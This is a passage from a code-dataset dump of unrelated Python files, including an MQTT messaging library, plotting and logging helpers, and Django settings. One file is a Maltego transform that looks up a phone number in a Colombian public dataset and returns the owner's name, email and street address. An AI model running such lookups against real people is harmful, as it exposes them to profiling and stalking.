(venta['total_sin_igv'] * 1.18))\n print()\n print('Datos del producto:')\n mostrar_datos_producto(buscar_producto(productos, venta['id_producto']))\n\ndef mostrar_datos_venta_producto(productos, datos_venta):\n producto = buscar_producto(productos, datos_venta[0])\n mostrar_datos_producto(producto)\n print('Cantidad vendida: %i' % datos_venta[1])\n","sub_path":"inventario/inventario_funciones.py","file_name":"inventario_funciones.py","file_ext":"py","file_size_in_byte":3096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"192046928","text":"#!/usr/bin/env python\r\n# -*- coding: cp1252 -*-\r\nfrom Maltego import *\r\nfrom MaltegoTransform import *\r\nimport pandas as pd\r\nfrom sodapy import Socrata\r\n\r\ndef TelefonoToCorreoDireccionPerson_mk5f_bdwx(m):\r\n TRX = MaltegoTransform()\r\n #m.parseArguments(sys.argv)\r\n #telefono=sys.argv[1]\r\n telefono=m.Value\r\n try:\r\n client = Socrata(\"www.datos.gov.co\", None)\r\n r = client.get(\"u5mc-hpr6\", limit=2000)\r\n\r\n #for key, value in data.items():\r\n #print key, value\r\n for i in range(len(r)):\r\n if ( r[i]['celular'] == telefono or r[i]['telefonos'] == telefono) :\r\n nombre=r[i]['nombre']\r\n correo_electronico= r[i]['correo_electronico']\r\n direccion=r[i]['direccion']\r\n barrio=r[i]['municipio']\r\n break\r\n\r\n nombre = nombre.split(\" \")\r\n if (len(nombre) == 4):\r\n firts = nombre[0] + \" \" + nombre[1]\r\n last = nombre[2] + \" \" + nombre[3]\r\n full = nombre[0] + \" \" + nombre[1] + \" \" + nombre[2] + \" \" + nombre[3]\r\n else:\r\n firts = nombre[0]\r\n last = nombre[1] + \" \" + nombre[2]\r\n full = nombre[0] + \" \" + nombre[1] + \" \" + nombre[2]\r\n\r\n ent = TRX.addEntity('maltego.Person', full)\r\n ent.addAdditionalFields(\"person.firtsnames\", \"Firts Names\", True, firts)\r\n ent.addAdditionalFields(\"person.lastname\", \"Surname\", True, last)\r\n ent1 = TRX.addEntity('maltego.EmailAddress', correo_electronico)\r\n ent4 = m.addEntity('maltego.Location', direccion)\r\n ent4.addAdditionalFields(\"country\", \"Country\", True, \"Colombia\")\r\n ent4.addAdditionalFields(\"location.area\", \"Area\", True, barrio)\r\n ent4.addAdditionalFields(\"streetaddress\", \"Street Address\", True, direccion)\r\n\r\n\r\n\r\n except Exception as e:\r\n TRX.addUIMessage(\"Cedula no encontrada en la base de datos\")\r\n\r\n TRX.returnOutput()\r\n\r\n\r\n","sub_path":"telefonoToCorreoDireccionPerson_mk5f-bdwx.py","file_name":"telefonoToCorreoDireccionPerson_mk5f-bdwx.py","file_ext":"py","file_size_in_byte":1956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"322386985","text":"import numpy as np\nfrom matplotlib.colors import ListedColormap\n\ncmpcolor = ['#FFAAAA', '#AAFFAA', '#AAAAFF']\n\n\ndef create_meshgrid_pic(plt, predict, X, Y, classes_color=cmpcolor, step=0.05):\n # 确认训练集的边界\n x_min, x_max = X[:].min() - 1, X[:].max() + 1\n y_min, y_max = Y[:].min() - 1, Y[:].max() + 1\n # 生成网格数据,xx:所有网格点的x坐标,形状也是网格性nxm。yy同样\n xx, yy = np.meshgrid(np.arange(x_min, x_max, step),\n np.arange(y_min, y_max, step))\n # xx,yy的扁平化成一串坐标点(密密麻麻的网格点平摊开来)\n d = np.c_[xx.ravel(), yy.ravel()]\n # 对网格点进行类型预测\n Z = predict(d)\n # 预测类型后,重新变回网格的样子,因为后面pcolormesh接收网格形式的绘图数据\n Z = Z.reshape(xx.shape)\n # 获取类型数量\n class_size = np.unique(Z).size\n if class_size > len(classes_color):\n print('颜色列表太少')\n return AttributeError\n print(class_size)\n classes_color = classes_color[:class_size]\n\n cmap_light = ListedColormap(classes_color)\n\n # 接收网格化的x,y,z\n plt.pcolormesh(xx, yy, Z, cmap=cmap_light)\n","sub_path":"绘图/网格绘图.py","file_name":"网格绘图.py","file_ext":"py","file_size_in_byte":1206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"200929456","text":"class node:\n def __init__(self,data):\n self.data=data\n self.next=None\n \ndef linkedlist(a):\n head=None\n current=None\n for i in a:\n if i==-1:\n break\n newnode=node(i)\n if head is None:\n head=newnode\n current=head\n else:\n current.next=newnode\n current=current.next\n return head\n\ndef length(head):\n c=0\n while head.next!=None:\n c+=1\n head=head.next\n return c+1 \n \ndef insert(head1,position,data):\n if position>(l+1):\n return head1\n newnode=node(data)\n head=head1\n if position==1:\n newnode.next=head\n head=newnode\n return head\n else: \n for i in range(position-2):\n head=head.next\n newnode.next=head.next\n head.next=newnode\n return head1\n\ndef printll(head):\n while head!=None:\n print(head.data,'-> ',end=\"\")\n head=head.next\n print(None)\n \na=[1,2,3,4,5,6,7,8,-1] \nhead=linkedlist(a)\nprintll(head)\n# insert(head,position,data)\nl=length(head)\nhead=insert(head,1,9)\nprintll(head)\n","sub_path":"DSA_python/05. Linked_list/insert_at_ithPosition_recursive.py","file_name":"insert_at_ithPosition_recursive.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"645481301","text":"\"\"\"\nMQTT Implementation\n\"\"\"\n\nimport datetime\nimport functools\nimport json\nimport time\nfrom enum import IntEnum\nfrom typing import Dict, Any, Tuple\n\nimport paho.mqtt.client as mqtt\n\nfrom commlib.action import (BaseActionClient, BaseActionService,\n _ActionCancelMessage, _ActionFeedbackMessage,\n _ActionGoalMessage, _ActionResultMessage,\n _ActionStatusMessage)\nfrom commlib.events import BaseEventEmitter, Event\nfrom commlib.exceptions import RPCClientTimeoutError, SubscriberError\nfrom commlib.logger import Logger\nfrom commlib.msg import PubSubMessage, RPCMessage, Object, DataField, DataClass\nfrom commlib.utils import gen_timestamp\nfrom commlib.pubsub import BasePublisher, BaseSubscriber\nfrom commlib.rpc import BaseRPCClient, BaseRPCService\nfrom commlib.serializer import JSONSerializer\n\n\n@DataClass\nclass CommObjectHeaderProps(Object):\n \"\"\"CommObjectHeaderProps.\n \"\"\"\n\n content_type: str = DataField(default='application/json')\n content_encoding: str = DataField(default='utf8')\n\n\n@DataClass\nclass CommPubSubHeader(Object):\n timestamp: int = DataField(default=gen_timestamp())\n properties: CommObjectHeaderProps = DataField(\n default_factory=CommObjectHeaderProps)\n\n\n@DataClass\nclass CommPubSubObject(Object):\n header: CommPubSubHeader = DataField(default_factory=CommPubSubHeader)\n data: Dict[str, Any] = DataField(default_factory=dict)\n\n\n@DataClass\nclass CommRPCHeader(Object):\n timestamp: int = DataField(default=gen_timestamp())\n reply_to: str = DataField(default='')\n properties: CommObjectHeaderProps = DataField(\n default_factory=CommObjectHeaderProps)\n\n\n@DataClass\nclass CommRPCObject(Object):\n header: CommRPCHeader = DataField(default_factory=CommRPCHeader)\n data: Dict[str, Any] = DataField(default_factory=dict)\n\n\n@DataClass\nclass CommEventHeader(Object):\n timestamp: int = DataField(default=gen_timestamp())\n properties: CommObjectHeaderProps = DataField(\n default_factory=CommObjectHeaderProps)\n\n\n@DataClass\nclass CommEventObject(Object):\n header: CommEventHeader = DataField(default_factory=CommEventHeader)\n data: Dict[str, Any] = DataField(default_factory=dict)\n\n\nclass MQTTReturnCode(IntEnum):\n CONNECTION_SUCCESS = 0\n INCORRECT_PROTOCOL_VERSION = 1\n INVALID_CLIENT_ID = 2\n SERVER_UNAVAILABLE = 3\n AUTHENTICATION_ERROR = 4\n AUTHORIZATION_ERROR = 5\n\n\nclass MQTTProtocolType(IntEnum):\n MQTTv31 = 1\n MQTTv311 = 2\n\n\nclass Credentials:\n def __init__(self, username: str = '', password: str = ''):\n self.username = username\n self.password = password\n\n\nclass ConnectionParameters:\n __slots__ = ['host', 'port', 'creds', 'protocol']\n def __init__(self,\n host: str = 'localhost',\n port: int = 1883,\n protocol: MQTTProtocolType = MQTTProtocolType.MQTTv311,\n creds: Credentials = Credentials()):\n \"\"\"__init__.\n\n Args:\n host (str): host\n port (int): port\n protocol (MQTTProtocolType): protocol\n creds (Credentials): creds\n \"\"\"\n self.host = host\n self.port = port\n self.protocol = protocol\n self.creds = creds\n\n @property\n def credentials(self):\n return self.creds\n\n\nclass MQTTTransport:\n \"\"\"MQTTTransport.\n \"\"\"\n\n def __init__(self,\n conn_params: ConnectionParameters = ConnectionParameters(),\n logger: Logger = None):\n \"\"\"__init__.\n\n Args:\n conn_params (ConnectionParameters): conn_params\n logger (Logger): logger\n \"\"\"\n self._conn_params = conn_params\n self._logger = logger\n self._connected = False\n\n self.logger = Logger(self.__class__.__name__) if \\\n logger is None else logger\n\n self._client = mqtt.Client(clean_session=True,\n protocol=mqtt.MQTTv311,\n transport='tcp')\n\n self._client.on_connect = self.on_connect\n self._client.on_disconnect = self.on_disconnect\n # self._client.on_log = self.on_log\n self._client.on_message = self.on_message\n\n self._client.username_pw_set(self._conn_params.creds.username,\n self._conn_params.creds.password)\n\n self._client.connect(self._conn_params.host, self._conn_params.port, 60)\n\n @property\n def is_connected(self):\n return self._connected\n\n def on_connect(self, client, userdata, flags, rc):\n if rc == MQTTReturnCode.CONNECTION_SUCCESS:\n self.logger.info(\n f\"Connected to MQTT broker <{self._conn_params.host}:{self._conn_params.port}>\")\n self._connected = True\n\n def on_disconnect(self, client, userdata, rc):\n if rc != 0:\n self.logger.warn(\"Unexpected disconnection from MQTT Broker.\")\n\n def on_message(self, client, userdata, msg):\n raise NotImplementedError()\n\n def on_log(self, client, userdata, level, buf):\n ## SPAM output\n # self.logger.debug(f'MQTT Log: {buf}')\n pass\n\n def publish(self, topic: str,\n payload: Dict[str, Any],\n qos: int = 0,\n retain: bool = False,\n confirm_delivery: bool = False):\n topic = topic.replace('.', '/')\n ph = self._client.publish(topic, payload, qos=qos, retain=retain)\n if confirm_delivery:\n ph.wait_for_publish()\n\n def subscribe(self, topic: str, callback: callable, qos: int = 0):\n ## Adds subtopic specific callback handlers\n topic = topic.replace('.', '/').replace('*', '#')\n self._client.subscribe(topic, qos)\n self._client.message_callback_add(topic, callback)\n\n def start_loop(self):\n self._client.loop_start()\n\n def stop_loop(self):\n self._client.loop_stop(force=True)\n\n def loop_forever(self):\n self._client.loop_forever()\n\n\nclass Publisher(BasePublisher):\n \"\"\"Publisher.\n MQTT Publisher\n \"\"\"\n\n def __init__(self,\n conn_params: ConnectionParameters = ConnectionParameters(),\n *args, **kwargs):\n \"\"\"__init__.\n\n Args:\n conn_params (ConnectionParameters): conn_params\n args: See BasePublisher\n kwargs: See BasePublisher\n \"\"\"\n self._msg_seq = 0\n self.conn_params = conn_params\n super().__init__(*args, **kwargs)\n self._transport = MQTTTransport(conn_params=conn_params,\n logger=self._logger)\n self._transport.start_loop()\n self._comm_obj = CommPubSubObject()\n self._comm_obj.header.properties.content_type = \\\n self._serializer.CONTENT_TYPE #pylint: disable=E1101\n self._comm_obj.header.properties.content_encoding = \\\n self._serializer.CONTENT_ENCODING #pylint: disable=E1101\n\n def publish(self, msg: PubSubMessage) -> None:\n \"\"\"publish.\n\n Args:\n msg (PubSubMessage): Message to Publish\n\n Returns:\n None:\n \"\"\"\n if self._msg_type is None:\n data = msg\n else:\n data = msg.as_dict()\n _msg = self._prepare_msg(data)\n _msg = self._serializer.serialize(_msg)\n self.logger.debug(f'Publishing Message to topic <{self._topic}>')\n self._transport.publish(self._topic, _msg)\n self._msg_seq += 1\n\n def _prepare_msg(self, data: Dict[str, Any]):\n \"\"\"_prepare_msg.\n Wraps in comm message. Includes header and data payload\n\n Args:\n data (Dict[str, Any]): data\n \"\"\"\n self._comm_obj.header.timestamp = gen_timestamp() #pylint: disable=E0237\n self._comm_obj.data = data\n return self._comm_obj.as_dict()\n\n\nclass MPublisher(Publisher):\n \"\"\"MPublisher.\n Multi-Topic Publisher\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super(MPublisher, self).__init__(topic='*', *args, **kwargs)\n\n def publish(self, msg: PubSubMessage, topic: str) -> None:\n \"\"\"publish.\n\n Args:\n msg (PubSubMessage): msg\n topic (str): topic\n\n Returns:\n None:\n \"\"\"\n if self._msg_type is None:\n data = msg\n else:\n data = msg.as_dict()\n _msg = self._prepare_msg(data)\n _msg = self._serializer.serialize(_msg)\n self._transport.publish(topic, _msg)\n self._msg_seq += 1\n\n\nclass Subscriber(BaseSubscriber):\n \"\"\"Subscriber.\n MQTT Subscriber\n \"\"\"\n\n def __init__(self,\n conn_params: ConnectionParameters = ConnectionParameters(),\n *args, **kwargs):\n \"\"\"__init__.\n\n Args:\n conn_params (ConnectionParameters): conn_params\n args: See BaseSubscriber\n kwargs: See BaseSubscriber\n \"\"\"\n self.conn_params = conn_params\n super(Subscriber, self).__init__(*args, **kwargs)\n self._transport = MQTTTransport(conn_params=conn_params,\n logger=self._logger)\n self._topic = self._validate_uri(self._topic)\n\n def _validate_uri(self, uri):\n # Use PSubscriber for pattern-based subscription\n if '.' in uri:\n self.logger.warn(\n 'Found \".\" character in topic definition. Replacing with \"/\"')\n uri = uri.replace('.', '/')\n return uri\n\n def run(self):\n self._transport.subscribe(self._topic,\n self._on_message)\n self._transport.start_loop()\n self.logger.info(f'Started Subscriber: <{self._topic}>')\n\n def run_forever(self):\n self._transport.subscribe(self._topic,\n self._on_message)\n self.logger.info(f'Started Subscriber: <{self._topic}>')\n self._transport.loop_forever()\n\n def _on_message(self, client, userdata, msg):\n try:\n data, header, uri = self._unpack_comm_msg(msg)\n if self._topic != uri:\n raise SubscriberError('Subscribed topic does not match!!')\n if self.onmessage is not None:\n if self._msg_type is None:\n _clb = functools.partial(self.onmessage, data)\n else:\n _clb = functools.partial(self.onmessage,\n self._msg_type(**data))\n _clb()\n except Exception:\n self.logger.error('Exception caught in _on_message', exc_info=True)\n\n def _unpack_comm_msg(self, msg: Dict[str, Any]) -> Tuple:\n _uri = msg.topic\n _payload = JSONSerializer.deserialize(msg.payload)\n _data = _payload['data']\n _header = _payload['header']\n return _data, _header, _uri\n\n\nclass PSubscriber(Subscriber):\n \"\"\"PSubscriber.\n \"\"\"\n\n def _on_message(self, client, userdata, msg):\n try:\n data, header, topic = self._unpack_comm_msg(msg)\n if self.onmessage is not None:\n if self._msg_type is None:\n _clb = functools.partial(self.onmessage,\n data,\n topic)\n else:\n _clb = functools.partial(self.onmessage,\n self._msg_type(**data),\n topic)\n _clb()\n except Exception:\n self.logger.error('Exception caught in _on_message', exc_info=True)\n\n\nclass RPCService(BaseRPCService):\n \"\"\"RPCService.\n MQTT RPC Service class.\n \"\"\"\n\n def __init__(self,\n conn_params: ConnectionParameters = None,\n *args, **kwargs):\n \"\"\"__init__.\n\n Args:\n conn_params (ConnectionParameters): conn_params\n args: See BaseRPCService\n kwargs: See BaseRPCService\n \"\"\"\n self.conn_params = conn_params\n super(RPCService, self).__init__(*args, **kwargs)\n self._transport = MQTTTransport(conn_params=conn_params,\n logger=self._logger)\n self._comm_obj = CommRPCObject()\n self._comm_obj.header.properties.content_type = \\\n self._serializer.CONTENT_TYPE #pylint: disable=E1101\n self._comm_obj.header.properties.content_encoding = \\\n self._serializer.CONTENT_ENCODING #pylint: disable=E1101\n\n def _send_response(self, data: dict, reply_to: str):\n self._comm_obj.header.timestamp = gen_timestamp() #pylint: disable=E0237\n self._comm_obj.data = data\n _resp = self._comm_obj.as_dict()\n _resp = self._serializer.serialize(_resp)\n self._transport.publish(reply_to, _resp)\n\n def _on_request_internal(self, client, userdata, msg):\n try:\n data, header, uri = self._unpack_comm_msg(msg)\n if self._msg_type is None:\n resp = self.on_request(data)\n else:\n resp = self.on_request(self._msg_type.Request(**data))\n ## RPCMessage.Response object here\n resp = resp.as_dict()\n except Exception as exc:\n self.logger.error(str(exc), exc_info=False)\n resp = {}\n reply_to = header['reply_to']\n self._send_response(resp, reply_to)\n\n def _unpack_comm_msg(self, msg: Dict[str, Any]) -> Tuple:\n _uri = msg.topic\n _payload = JSONSerializer.deserialize(msg.payload)\n _data = _payload['data']\n _header = _payload['header']\n return _data, _header, _uri\n\n def run_forever(self):\n \"\"\"run_forever.\n \"\"\"\n self._transport.subscribe(self._rpc_name,\n self._on_request_internal)\n self._transport.start_loop()\n while True:\n if self._t_stop_event is not None:\n if self._t_stop_event.is_set():\n self.logger.debug('Stop event caught in thread')\n break\n time.sleep(0.001)\n self._transport.stop_loop()\n\n def stop(self):\n self._t_stop_event.set()\n\n\nclass RPCClient(BaseRPCClient):\n \"\"\"RPCClient.\n MQTT RPC Client\n \"\"\"\n\n def __init__(self,\n conn_params: ConnectionParameters = None,\n *args, **kwargs):\n \"\"\"__init__.\n\n Args:\n conn_params (ConnectionParameters): conn_params\n args: See BaseRPCClient\n kwargs: See BaseRPCClient\n \"\"\"\n self.conn_params = conn_params\n self._response = None\n\n super(RPCClient, self).__init__(*args, **kwargs)\n self._transport = MQTTTransport(conn_params=conn_params,\n logger=self._logger)\n self._transport.start_loop()\n self._comm_obj = CommRPCObject()\n self._comm_obj.header.properties.content_type = \\\n self._serializer.CONTENT_TYPE #pylint: disable=E1101\n self._comm_obj.header.properties.content_encoding = \\\n self._serializer.CONTENT_ENCODING #pylint: disable=E1101\n\n def _gen_queue_name(self):\n return f'rpc-{self._gen_random_id()}'\n\n def _prepare_request(self, data):\n self._comm_obj.header.timestamp = gen_timestamp() #pylint: disable=E0237\n self._comm_obj.header.reply_to = self._gen_queue_name()\n self._comm_obj.data = data\n return self._comm_obj.as_dict()\n\n def _on_response_wrapper(self, client, userdata, msg):\n try:\n data, header, uri = self._unpack_comm_msg(msg)\n except Exception as exc:\n self.logger.error(exc, exc_info=True)\n data = {}\n self._response = data\n\n def _unpack_comm_msg(self, msg: Dict[str, Any]) -> Tuple:\n _uri = msg.topic\n _payload = JSONSerializer.deserialize(msg.payload)\n _data = _payload['data']\n _header = _payload['header']\n return _data, _header, _uri\n\n def _wait_for_response(self, timeout: float = 10.0):\n \"\"\"_wait_for_response.\n\n Args:\n timeout (float): timeout\n \"\"\"\n start_t = time.time()\n while self._response is None:\n elapsed_t = time.time() - start_t\n if elapsed_t >= timeout:\n raise RPCClientTimeoutError(\n f'Response timeout after {timeout} seconds')\n time.sleep(0.001)\n return self._response\n\n def call(self, msg: RPCMessage.Request,\n timeout: float = 30) -> RPCMessage.Response:\n \"\"\"call.\n\n Args:\n msg (RPCMessage.Request): msg\n timeout (float): timeout\n\n Returns:\n RPCMessage.Response:\n \"\"\"\n ## TODO: Evaluate msg type passed here.\n if self._msg_type is None:\n data = msg\n else:\n data = msg.as_dict()\n\n self._response = None\n\n _msg = self._prepare_request(data)\n _reply_to = _msg['header']['reply_to']\n _msg = self._serializer.serialize(_msg)\n\n self._transport.subscribe(_reply_to, callback=self._on_response_wrapper)\n start_t = time.time()\n self._transport.publish(self._rpc_name, _msg)\n _resp = self._wait_for_response(timeout=timeout)\n elapsed_t = time.time() - start_t\n self._delay = elapsed_t\n\n if self._msg_type is None:\n return _resp\n else:\n return self._msg_type.Response(**_resp)\n\n\nclass ActionService(BaseActionService):\n \"\"\"ActionService.\n MQTT Action Server\n \"\"\"\n\n def __init__(self,\n conn_params: ConnectionParameters = ConnectionParameters(),\n *args, **kwargs):\n \"\"\"__init__.\n\n Args:\n conn_params (ConnectionParameters): conn_params\n args: See BaseActionService\n kwargs: See BaseActionService\n \"\"\"\n \"\"\"__init__.\n\n Args:\n conn_params (ConnectionParameters): conn_params\n args:\n kwargs:\n \"\"\"\n super(ActionService, self).__init__(*args, **kwargs)\n\n self._goal_rpc = RPCService(msg_type=_ActionGoalMessage,\n rpc_name=self._goal_rpc_uri,\n conn_params=conn_params,\n on_request=self._handle_send_goal,\n logger=self._logger,\n debug=self.debug)\n self._cancel_rpc = RPCService(msg_type=_ActionCancelMessage,\n rpc_name=self._cancel_rpc_uri,\n conn_params=conn_params,\n on_request=self._handle_cancel_goal,\n logger=self._logger,\n debug=self.debug)\n self._result_rpc = RPCService(msg_type=_ActionResultMessage,\n rpc_name=self._result_rpc_uri,\n conn_params=conn_params,\n on_request=self._handle_get_result,\n logger=self._logger,\n debug=self.debug)\n self._feedback_pub = Publisher(msg_type=_ActionFeedbackMessage,\n topic=self._feedback_topic,\n conn_params=conn_params,\n logger=self._logger,\n debug=self.debug)\n self._status_pub = Publisher(msg_type=_ActionStatusMessage,\n topic=self._status_topic,\n conn_params=conn_params,\n logger=self._logger,\n debug=self.debug)\n\n\nclass ActionClient(BaseActionClient):\n \"\"\"ActionClient.\n MQTT Action Client\n \"\"\"\n\n def __init__(self,\n conn_params: ConnectionParameters = ConnectionParameters(),\n *args, **kwargs):\n \"\"\"__init__.\n\n Args:\n conn_params (ConnectionParameters): Broker Connection Parameters\n args: See BaseActionClient\n kwargs: See BaseActionClient\n \"\"\"\n super(ActionClient, self).__init__(*args, **kwargs)\n\n self._goal_client = RPCClient(msg_type=_ActionGoalMessage,\n rpc_name=self._goal_rpc_uri,\n conn_params=conn_params,\n logger=self._logger,\n debug=self.debug)\n self._cancel_client = RPCClient(msg_type=_ActionCancelMessage,\n rpc_name=self._cancel_rpc_uri,\n conn_params=conn_params,\n logger=self._logger,\n debug=self.debug)\n self._result_client = RPCClient(msg_type=_ActionResultMessage,\n rpc_name=self._result_rpc_uri,\n conn_params=conn_params,\n logger=self._logger,\n debug=self.debug)\n self._status_sub = Subscriber(msg_type=_ActionStatusMessage,\n conn_params=conn_params,\n topic=self._status_topic,\n on_message=self._on_status)\n self._feedback_sub = Subscriber(msg_type=_ActionFeedbackMessage,\n conn_params=conn_params,\n topic=self._feedback_topic,\n on_message=self._on_feedback)\n self._status_sub.run()\n self._feedback_sub.run()\n\n\nclass EventEmitter(BaseEventEmitter):\n \"\"\"EventEmitter.\n MQTT Event Emitter class\n \"\"\"\n\n def __init__(self,\n conn_params: ConnectionParameters = None,\n *args, **kwargs):\n \"\"\"__init__.\n\n Args:\n conn_params (ConnectionParameters): Broker Connection Parameters\n args: See BaseEventEmitter\n kwargs: See BaseEventEmitter\n \"\"\"\n super(EventEmitter, self).__init__(*args, **kwargs)\n\n self._transport = MQTTTransport(conn_params=conn_params,\n logger=self._logger)\n self._transport.start_loop()\n self._comm_obj = CommEventObject()\n self._comm_obj.header.properties.content_type = \\\n self._serializer.CONTENT_TYPE #pylint: disable=E1101\n self._comm_obj.header.properties.content_encoding = \\\n self._serializer.CONTENT_ENCODING #pylint: disable=E1101\n\n def send_event(self, event: Event) -> None:\n \"\"\"send_event.\n\n Args:\n event (Event): The Event to send.\n\n Returns:\n None:\n \"\"\"\n _msg = event.as_dict()\n _msg = self._prepare_msg(_msg)\n _msg = self._serializer.serialize(_msg)\n self.logger.debug(f'Firing Event: {event.name}:<{event.uri}>')\n self._transport.publish(event.uri, _msg)\n\n def _prepare_msg(self, data: Dict[str, Any]) -> None:\n \"\"\"_prepare_msg.\n\n Args:\n data (Dict[str, Any]): data\n\n Returns:\n None:\n \"\"\"\n self._comm_obj.header.timestamp = gen_timestamp() #pylint: disable=E0237\n self._comm_obj.data = data\n return self._comm_obj.as_dict()\n","sub_path":"commlib/transports/mqtt.py","file_name":"mqtt.py","file_ext":"py","file_size_in_byte":23795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"333522841","text":"import os\nimport torchvision\nimport torch\nfrom train_utils import *\n\n\ndef write_out_transforms(config):\n for transform in config[\"train_transforms\"]:\n config[str(transform).split('(')[0]] = transform\n for transform in config[\"val_transforms\"]:\n config[str(transform).split('(')[0]] = transform\n\ndef save_batch_as_image(X_batch, Y_batch, outputs, seen_train_ex, label, other_logdir, num_rows_to_plot=3):\n save_batch = False\n np_grid = []\n num_rows_to_plot = min(X_batch.size(0), num_rows_to_plot)\n\n for i in range(num_rows_to_plot):\n input_img = X_batch[i].cpu().float()\n #input_img = torch.cat([input_img, input_img, input_img])\n mask = predb_to_mask(outputs.clone(), i)\n mask = convert_tensor_to_RGB(mask)\n gt = Y_batch[i].cpu()\n gt = convert_tensor_to_RGB(gt)\n np_grid.append(input_img)\n np_grid.append(mask)\n np_grid.append(gt)\n\n grid = torchvision.utils.make_grid(np_grid, nrow=num_rows_to_plot)\n #grid = torchvision.transforms.functional.resize(grid, 256)\n save_dir = os.path.join(other_logdir, label)\n os.makedirs(save_dir, exist_ok=True)\n save_path = os.path.join(save_dir, f'{format(seen_train_ex, \"09d\")}.png')\n\n torchvision.utils.save_image(grid,save_path)\n return save_batch\n\n\ndef save_batch_tensorboard(X_batch, Y_batch, outputs, seen_train_ex, tb_writer, label, num_rows_to_plot=3):\n save_batch = False\n np_grid = []\n num_rows_to_plot = min(X_batch.size(0), num_rows_to_plot)\n\n for i in range(num_rows_to_plot):\n input_img = X_batch[i].cpu().float()\n input_img = torch.cat([input_img, input_img, input_img])\n mask = predb_to_mask(outputs.clone(), i)\n mask = convert_tensor_to_RGB(mask)\n gt = Y_batch[i].cpu()\n gt = convert_tensor_to_RGB(gt)\n np_grid.append(input_img)\n np_grid.append(mask)\n np_grid.append(gt)\n\n grid = torchvision.utils.make_grid(np_grid, nrow=num_rows_to_plot)\n #grid = torchvision.transforms.functional.resize(grid, 256)\n tb_writer.add_image(label, grid, global_step=seen_train_ex)\n return save_batch\n\n\ndef print_epoch_stats(epoch, epochs, avg_train_loss, avg_train_acc):\n print('Epoch {}/{}'.format(epoch, epochs - 1))\n print('-' * 10)\n print('{} Loss: {:.4f} PxAcc: {}'.format(\"Train\", avg_train_loss, avg_train_acc))\n print('-' * 10)\n\n","sub_path":"machine-learning/ml-projects/stereo-cam-v1/utils/logger_utils.py","file_name":"logger_utils.py","file_ext":"py","file_size_in_byte":2385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"208110343","text":"import os\nSECRET_KEY = os.environ.get('SECRET_KEY')\nDEBUG = False\n\nTEMPLATE_DEBUG = False\n\nALLOWED_HOSTS = ['*']\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.mysql',\n 'NAME': os.environ.get('DB_NAME'),\n 'HOST': os.environ.get('DB_HOST'),\n 'PORT': os.environ.get('DB_PORT'),\n 'USER': os.environ.get('DB_USER'),\n 'PASSWORD': os.environ.get('DB_PASSWORD'),\n }\n}\n#EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'\n#EMAIL_HOST = 'smtp.mxhichina.com'\n#EMAIL_HOST_USER = os.environ.get('EMAIL_USER')\n#EMAIL_HOST_PASSWORD = os.environ.get('EMAIL_PASSWORD')\n#EMAIL_PORT = 465\n#EMAIL_USE_TLS = True\n#SERVER_EMAIL = os.environ.get('EMAIL_USER')\nADMINS = (('Guang Chen', 'cgcgbcbc@163.com'),)\n\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'handlers': {\n 'console': {\n 'level': 'INFO',\n 'class': 'logging.StreamHandler',\n },\n },\n 'loggers': {\n 'django': {\n 'handlers': ['console'],\n 'propagate': True,\n },\n },\n}\n\nBASE_DIR = os.path.dirname(os.path.dirname(__file__))\n\nSTATIC_ROOT = os.path.join(BASE_DIR, 'static').replace('\\\\', '/')\n\nSITE_DOMAIN = os.environ.get('SITE_DOMAIN')\n","sub_path":"urlhandler/urlhandler/settings_production.py","file_name":"settings_production.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"107033132","text":"import operator\nimport os\nimport sys\n\n\ndef main(argv=None):\n if argv is None:\n argv = sys.argv\n\n warnings_file = _validate_input(argv)\n with open(warnings_file) as f:\n lines = [line.strip().split(',')[3] for line in f.readlines()]\n warning_dict = {}\n for line in lines:\n if line in warning_dict:\n warning_dict[line] += 1\n else:\n warning_dict[line] = 1\n sorted_x = sorted(warning_dict.items(),\nkey=operator.itemgetter(1))\n\n with open('warnings.txt', 'w+') as f:\n for x in sorted_x:\n f.write('{}\\n'.format(x))\n\n\ndef _validate_input(argv):\n warnings_file = argv[1]\n\n if not os.path.isfile(warnings_file):\n _print_usage()\n sys.exit(1)\n\n return warnings_file\n\nif __name__ == \"__main__\":\n sys.exit(main())\n","sub_path":"scripts/parsers/infer_warnings.py","file_name":"infer_warnings.py","file_ext":"py","file_size_in_byte":815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"166983779","text":"#\n# (C) Copyright IBM Corp. 2019\n# (C) Copyright Cloudlab URV 2020\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\nimport os\nimport json\nimport importlib\nimport logging\nimport multiprocessing as mp\nimport lithops.constants as constants\nfrom lithops.version import __version__\nfrom lithops.utils import verify_runtime_name\n\nlogger = logging.getLogger(__name__)\n\n\ndef load_yaml_config(config_filename):\n import yaml\n\n with open(config_filename, 'r') as config_file:\n data = yaml.safe_load(config_file)\n\n return data\n\n\ndef dump_yaml_config(config_filename, data):\n import yaml\n if not os.path.exists(os.path.dirname(config_filename)):\n os.makedirs(os.path.dirname(config_filename))\n\n with open(config_filename, \"w\") as config_file:\n yaml.dump(data, config_file, default_flow_style=False)\n\n\ndef get_default_config_filename():\n \"\"\"\n First checks .lithops_config\n then checks LITHOPS_CONFIG_FILE environment variable\n then ~/.lithops/config\n \"\"\"\n if 